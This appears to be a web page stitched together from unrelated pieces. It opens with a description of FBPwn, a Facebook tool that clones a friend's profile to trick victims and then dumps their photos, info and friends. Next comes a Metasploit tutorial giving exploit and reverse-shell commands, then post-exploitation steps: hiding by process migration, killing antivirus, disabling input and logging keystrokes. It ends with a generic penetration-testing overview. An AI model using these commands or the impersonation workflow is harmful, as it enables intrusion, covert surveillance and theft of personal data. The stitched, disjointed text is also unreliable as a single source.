A cross-platform Java based Facebook profile dumper, sends friend requests to a list of Facebook profiles, and polls for the acceptance notification. Once the victim accepts the invitation, it dumps all their information,photos and friend list to a local folder.
Modules
All modules work on a selected profile URL (we'll call him bob), using a valid authenticated account (we'll call him mallory).
- AddVictimFriends: Request to add some or all friends of bob to increase the chance of bob accepting any future requests, after he finds that you have common friends.
- ProfileCloner: A list of all bob's friends is displayed, you choose one of them (we'll call him andy). FBPwn will change mallory's display picture, and basic info to match andy's. This will generate more chance that bob accepts requests from mallory as he thinks he is accepting from andy. Eventually bob will realize this is not andy's account, but probably it would be too late as all his info are already saved for offline checking by mallory.
- CheckFriendRequest: Check if mallory is already friend of bob, then just end execution. If not, the module tries to add bob as as a friend and poll waiting for him to accept. The module will not stop executing until the friend request is accepted.
- DumpFriends: Accessable friends of bob is saved for offline viewing. The output of the module depends on other modues, if mallory is not a friend of bob yet, the data might not be accessable and nothing will be dumped.
- DumpImages: Accessable images (tagged and albums) are saved for offline viewing. Same limitations of dump friends applies.
- DumpInfo: Accessable basic info are saved for offline viewing. Same limitations of dump friends applies.
Welcome to the Metasploit Basics Part 3. In this part i will show you a live example of how to own a PC with some exploit and what to do after the Meterpreter session is opened. In short i will explain you about the Meterpreter.
The beauty of the Meterpreter is that it runs by injecting itself into the vulnerable running process on the remote system once exploitation occurs. All commands run through Meterpreter also execute within the context of the running process.
Meterpreter short form Meta-Interpreter .The Meterpreter is one of the advanced payloads available with the MSF. The way to look at the Meterpreter is not simply as a payload, but rather as an exploit platform that is executed on the remote system.The Meterpreter has its own command shell, which provides the attacker with a wide variety of activities that can be executed on the exploited system.in short the meterpreter helps us to overcome the limitations and disadvantages of a individual payload like the adduser payload
I will be using my localhost and my virtual machine to demonstrate this so that you can understand better.I will own a XP box with my Backtrack and Metasploit. Unfortunately my XP was a patched version so i thought to use one exploit which gives a better chance to own a PC
msf > use windows/browser/ms10_046_shortcut_icon_dllloader msf exploit(ms10_046_shortcut_icon_dllloader) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(ms10_046_shortcut_icon_dllloader) > set lhost 192.168.56.128 ( your ip :P ) lhost => 192.168.56.128 msf exploit(ms10_046_shortcut_icon_dllloader) > set srvhost 192.168.56.128 ( localhost to listen on) srvhost => 192.168.56.128
Now i type exploit and the server starts ..
Now it up to you to do some clever social engineering regarding the situation your in.Give the Ip in which we have to give the [*] Using URL : http://192.168.56.128:80/ to the victim ( This is just my Local Host IP . If you are using Backtrack and metasploit on a virtual machine your ip will be 192.***.***.*** which may vary . Note- You cannot use this globally or over internet unless you forward your ip on the virtual machine. If you are using it as your Host OS or Live then on connect to the internet the ip becomes your your ISP ip which can be used over internet ) Have a look here
Now within a second this becomes ..
Ok now Part 1 and Part 2 have been shown practically. Time for Part 3 to start
Type in sessions to make sure we have an active session. Once we know we have one type in seesions -i and the id number next to the session you want to interact with.
We are in the meterpreter shell now we can do a lot of things there.
Now lets see the list of available commands in our meterpreter
meterpreter > help
Core Commands =============
Command Description ------- -----------
? Help menu
background Backgrounds the current session
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information about active channels
close Closes a channel
exit Terminate the meterpreter session
help Help menu
info Displays information about a Post module
interact Interacts with a channel
irb Drop into irb scripting mode
load Load one or more meterpreter extensions
migrate Migrate the server to another process
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
use Deprecated alias for 'load'
write Writes data to a channel
Stdapi: File system Commands ============================
Command Description ------- ----------- cat Read the contents of a file to the screen cd Change directory del Delete the specified file download Download a file or directory edit Edit a file getlwd Print local working directory getwd Print working directory lcd Change local working directory lpwd Print local working directory ls List files mkdir Make directory pwd Print working directory rm Delete the specified file rmdir Remove directory search Search for files upload Upload a file or directory
Command Description ------- ----------- ipconfig Display interfaces portfwd Forward a local port to a remote service route View and modify the routing table
Stdapi: System Commands =======================
Command Description ------- ----------- clearev Clear the event log drop_token Relinquishes any active impersonation token. execute Execute a command getpid Get the current process identifier getprivs Attempt to enable all privileges available to the current process getuid Get the user that the server is running as kill Terminate a process ps List running processes reboot Reboots the remote computer reg Modify and interact with the remote registry rev2self Calls RevertToSelf() on the remote machine shell Drop into a system command shell shutdown Shuts down the remote computer steal_token Attempts to steal an impersonation token from the target process sysinfo Gets information about the remote system, such as OS
Stdapi: User interface Commands ===============================
Command Description ------- ----------- enumdesktops List all accessible desktops and window stations getdesktop Get the current meterpreter desktop idletime Returns the number of seconds the remote user has been idle keyscan_dump Dump the keystroke buffer keyscan_start Start capturing keystrokes keyscan_stop Stop capturing keystrokes screenshot Grab a screenshot of the interactive desktop setdesktop Change the meterpreters current desktop uictl Control some of the user interface components
Stdapi: Webcam Commands =======================
Command Description ------- ----------- record_mic Record audio from the default microphone for X seconds webcam_list List webcams webcam_snap Take a snapshot from the specified webcam
Priv: Elevate Commands ======================
Command Description ------- ----------- getsystem Attempt to elevate your privilege to that of local system.
Time Won't Allow me to explain all functions bit by bit . I will just brief it
Every time i break into a box i prefer seeking more information about i.So i type
meterpreter > sysinfo Computer : SAURAV-79E14E1B OS : Windows XP (Build 2600, Service Pack 3). Architecture : x86 System Language : en_US Meterpreter : x86/win32
Impressive isn't it ?
Next I always migrate to a new process in order to hide myself. Be sure to choose something that is always running or you may get cut off. type the ps command to find out whats running.
Now to see a list of processes running i type ps
Now i migrate to another by typing migrate PID .. ex meterpreter > migrate 416 [*] Migrating to 416... [*] Migration completed successfully.
You can also disable the keyboard and the mouse and then re enable them.
meterpreter > uictl disable keyboard
Disabling keyboard...
meterpreter > uictl disable mouse
Disabling mouse...
meterpreter > uictl enablemouse
Enabling mouse...
meterpreter > uictl enablekeyboard
Enabling keyboard...
Now lets see how to sniff Keystrokes /m\ Commands in use keyscan_dump keyscan_start keyscan_stop
I made a very small video demonstrating this
The networking commands also help us a lot in the game
When i type the ipconfig command the meterpreter shows me all the network IPs to me.
meterpreter > ipconfig
WAN (PPP/SLIP) Interface Hardware MAC: 00:5*:45:00:00:00 IP Address : 5*.1**.1**.2 Netmask : 255.255.255.255
MS TCP Loopback interface Hardware MAC: 00:00:00:00:00:00 IP Address : 127.0.0.1 Netmask : 255.0.0.0
VMware Virtual Ethernet Adapter for VMnet1 Hardware MAC: 00:50:56:c5:00:01 IP Address : 192.168.38.1 Netmask : 255.255.255.0
VMware Virtual Ethernet Adapter for VMnet8 Hardware MAC: 00:50:56:c0:00:08 IP Address : 192.168.56.1 Netmask : 255.255.255.0
Using the System Commands .... This video will demonstrates some of the system commands at work when i try to download one file edit it and then upload it into a folder in the victims computer
Metasploit also allows you to use script on the victim from the meterpreter shell.Metasploit is coded in ruby so ruby scripts works well.There are a number of scripts already included in Metasploit if you know Ruby you can write your scripts also. i will not cover all the scripts but some
killav.rb (kills all anti viruses running on system) getcountermeasure.rb (kills av’s and fw’s/ids’) gettelnet.rb (able to open a telnet server on the customer with a username and password) checkvm.rb (checks to see if it is a VM. And version numbers) keylogrecorder.rb ( Records Keystroke ) netenum.rb search_dwld.rb winbf.rb credcollect.rb hostsedit.rb remotewinenum.rb scheduleme.rb schtasksabuse.rb wmic.rb get_local_subnets.rb migrate.rb ...... more
So lets run a some scripts so you understand the idea of what game is on
meterpreter > run killav [*] Killing Antivirus services on the target
[*] Killing off Monitor.exe
meterpreter > run checkvm [*] Checking if target is a Virtual Machine
[*] It appears to be physical host. meterpreter >
P.S - you can type script -h to get the available help from the script ex - run scraper -h
meterpreter > run keylogrecorder [*] firefox.exe Process found, migrating into 1812 [*] Migration Successful!! [*] Starting the keystroke sniffer... [*] Keystrokes being saved in to /root/.msf3/logs/keylogrecorder/96.28.86.172_20091221.2422/96.28.86.172_20091221.2422.db [*] Recording ...
The strokes are saved to a database on the attackers machine for reference at a later date.
You can try the rest commands on your own. Time and Blogger wont permit me to explain more because this have become a large one. So Any suggestions , Praises are welcomed
---kudos to rapid7 community for such a good tool metasploit.---
This article is just to give you the Basic knowledge and making you understand the Fundamentals of Penetration Testing
Goal of this Article
q
An overview of how Vulnerability Assessment (VA) & Penetration Testing (PT) is done
qDefining scope of the assessment
qTypes of Penetration Testing
qA brief understanding on how Buffer Overflow works
qHow vulnerabilities are scanned and exploited
qWhat are the end results
qWhat a Penetration Testing Report should contain
Differentiating VA and PT
Vulnerability Assessment (VA)
In this case the security auditor has to only scan for the vulnerabilities in the server or application and filter out the false positives from the scan output by mapping them with the actual vulnerabilities associated with the target host.
VA Scope Includes:
• The VA test can be done both internally and externally
• No vulnerabilities are exploited
• No dangerous attacks like DOS and Buffer Overflow attacks are used
• Automated vulnerability scanning tools line Nessus, Retina or ISS are used
Penetration Testing (PT)
In this case the security auditor or the penetration tester not only has to scan for the vulnerabilities in the server or application but also has to exploit them to gain access to the remote server.
PT Scope Includes:
• The PT test is done both internally and externally
• Vulnerabilities are exploited
• Dangerous attacks like DOS and Buffer Overflow attacks are used depending upon
the customer’s willingness to do so
• Automated vulnerability scanning tools and as well as exploits are used
Types Of Penetration Testing
Black Box Penetration Testing
Pen tester has no previous knowledge of the remote network
• Simulating a real world hacking by a hacker who has no knowledge
(E.g. Operating System running, application running, device type and
network topology etc..) of the remote network environment
White Box Penetration Testing
• Have the knowledge of the remote network
•Type of Pen tester network devices (i.e. Cisco gear, TCP/IP),
•WebServer details (i.e., Apache/*nix or Apache/Win2k),
•Operating System type (i.e., Windows/*nix),
•Database platform (i.e., Oracle or MS SQL),
•Load balancers (i.e. Alteon),
Firewalls (i.e. Cisco PIX).. etc
•Simulating a attack by a hacker who is having a detailed knowledge of the remote network environment
Scope Of Penetration Testing
Non-Destructive Test
•Scans the remote hosts for possible vulnerabilities
•Analyze and confirm the findings
•Map the vulnerabilities with proper exploits
•Exploit the remote system with proper care to avoid disruption of service
•No highly critical Denial of Service (DoS) attack is tried
Destructive Test
•Scans the remote hosts for possible vulnerabilities
• Analyze and confirm the findings
• Map the vulnerabilities with proper exploits
•All highly critical Denial of Service (DoS) attacks (e,g like buffer overflows are tried
~~~ Moving On To Penetration Testing ~~~
Penetration testing includes some steps ...
qFingerprinting or Footprinting
qNetwork Information Gathering
qSurveying / Network Mapping
qPorts Scanning and Services Identification
qEvading Firewall Rules
qAutomated Vulnerability Scanning
qExploiting Services for Known Vulnerabilities
qExploiting Web-Based Authorization
qPassword Cracking / Brute Forcing
qDenial of Services (DoS) Testing
qEscalation of Privileges
FLOW CHART
1. Information Gathering
This is the first step for any remote host Penetration Testing. Here the pen-tester try to gather maximum information on the remote host to precise the attack.
Expected Results:
qZone Transfer Information
q Domain Registration Information
q Email IDs
q IP Addresses Range
Sample Screenshot (Server queried for Zone-Transfer Info):
(Information Gathered from Zone-Transfer Info)
2. Footprinting / Fingerprinting
In this step, information like WebServer and OS type running on remote host are gathered to further precise the attack.
A network survey serves often as an introduction to the systems to be tested. It is best defined as a combination of data collection, information gathering, and policy control.
Expected Results:
qFirewall / Routers / IDS Discovery
qPossible Local Network / Subnet Discovery
qIP Addresses Range
qNetwork Topology Mapping
qISP information
Sample Screenshot (Local address of the remote network discovered):
4. Port Scanning & Services Identification
Port scanning is the invasive probing of system ports on the transport and network level. This module is to enumerate live or accessible Internet services as well as penetrating the firewall to find additional live systems.
Expected Results:
qOpen, closed or filtered ports
qServices Identification
Sample Screenshot (NMAP port scan output):
5. Evading Firewall Rules
In this phase, firewall evasion techniques are used to bypass firewall rules. This can further help in port scanning, remote host detection and remote network discovery.
Expected Results:
q Mapping of firewall configuration rules
q Partial Access to devices behind the firewall
Sample Screenshot : (Trace Route using UDP packets)
It is clear from the two screenshots that the packet filtering device (i.e. Firewall / Router) is not configured to block UDP packets.
6. Automated Vulnerability Scanning
The focus of this module is identifying, understanding, and verifying the weaknesses, misconfigurations and vulnerabilities associated with remote host. The scanning is done using automated tools or scripts to make the process faster.
Expected Results:
qList of vulnerabilities associated with each remote services
qList of possible denial of service vulnerabilities
qPossible misconfiguration on the remote server
Sample Screenshot
What is MVS ?
MVS is an automated Internet Vulnerability Scanner which can scans for web based vulnerabilities (Ex: CGI/IIS Unicode) associated with a remote host running a web server. The scanner displayed, shows that the target host is vulnerable to IIS Unicode. The vulnerable string has been highlighted in the below screen shot
7. Exploiting Services For Known Vulnerabilities
This is the most important phase of penetration testing. Here the weaknesses found in the remote services are exploited using openly available exploits or self developed or customized exploits.
Here the web application flaws are exploited to gain access to restricted information. The Web-Based authentication is exploited by using XSS (Cross-Site Scripting) or SQL injection or MITM (Man-in-the-middle) attacks etc...
Expected Results:
qAccess to restricted / confidential information
q Control over web configuration
q Can also leads to gaining access over other servers
Sample Screenshot (SQL injection used for gaining access to admin page):
8. Password Cracking or Brute Forcing
Password cracking is the process of validating password strength through the use of automated password recovery tools that expose either the application of weak passwords due to human factors.
Password Lists and Words List are use for validating the password in this process
Denial of Service (DoS) is a situation where the applications or services running over the remote system stops functioning and prevents authenticated network users or devices to access it.
Expected Results:
Disruption of Services
q List of other possible DoS vulnerable associated with the systems
qSabotage of remote network
Sample Screenshot (DOS attack for CISCO):
10. Escalation of Privileges
Escalation of Privileges is the type of rights the attacker gains over the remote system. It is the final stage of the remote host hacking where the attacker gains complete control over the remote system.
Expected Results:
q Gain administrator / super user rights
q Gain privilege to retrieve or modify confidential data
